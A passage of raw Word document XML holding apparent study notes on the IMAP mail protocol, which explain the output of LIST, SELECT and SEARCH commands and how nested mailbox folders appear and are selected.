      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002811">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Regarding the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a2 list "" *</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> output:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002812">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="862"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">list "" * asks for all mailboxes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002813">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="862"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">* LIST ... INBOX = only one mailbox, named INBOX.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002814">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="862"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\HasNoChildren =</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> no subfolders </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">under INBOX.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002815">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="862"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a2 OK ... = command finished successfully, with timing stat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002816">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002817">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002818">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Regarding the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> a3 select INBOX</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> output:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002819">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="340"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">select INBOX → open the INBOX folder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000281A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="340"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FLAGS = possible message flags:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000281B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="340"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\Answered, \Flagged, \Deleted, \Seen, \Draft.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000281C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="340"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PERMANENTFLAGS = flags you’re allowed to set.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000281D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="340"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1 EXISTS = there’s 1 email in the INBOX.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000281E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="340"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0 RECENT = no new/unread messages since last check.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000281F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="340"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UIDVALIDITY = mailbox identifier (used by clients to sync).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002820">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="340"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UIDNEXT 2 = the next message UID that will be assigned.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002821">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="340"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">READ-WRITE = you have permission to modify mailbox (mark read/delete).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002822">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002823">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Regarding the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a4 search all </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">output:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002824">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="683"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">search all → list all message numbers in mailbox.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002825">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="683"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">* SEARCH 1 → message #1 is the only one.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002826">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="683"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Useful for finding message IDs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002827">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002828">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ehamnm9su6hh" w:id="350"/>
      <w:bookmarkEnd w:id="350"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dealing with multiple mailboxes/folders and sub folders</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002829">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000282A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, we only had one folder/mailbox which was INBOX and it has no subfolders. But, if we had multiple mailboxes/folders and they had subfolders, then </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a1 list "" * </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">might return:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000282B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1444"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">* LIST (\HasChildren) "/" "INBOX"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000282C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1444"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">* LIST (\HasNoChildren) "/" "INBOX/Sales"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000282D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1444"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">* LIST (\HasNoChildren) "/" "INBOX/Support"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000282E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1444"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">* LIST (\HasNoChildren) "/" "Sent"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000282F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1444"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">* LIST (\HasNoChildren) "/" "Drafts"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002830">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1444"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">* LIST (\HasNoChildren) "/" "Trash"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002831">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1444"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a1 OK LIST completed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002832">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002833">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="682"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002834">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="682"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\HasChildren = folder has subfolders</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002835">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="682"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\HasNoChildren = folder does not</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="682"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"/" = hierarchy delimiter (in this case /). Some servers use . or another character.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002837">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="682"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So if you see "INBOX/Sales", that’s a subfolder under INBOX.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002838">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002839">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to interact with it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000283A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a1 select INBOX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000283B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a2 select "INBOX/Sales"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000283C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a3 select "Sent"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000283D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000283E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You subfolders and folders/mailboxes are interacted with the exact same</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
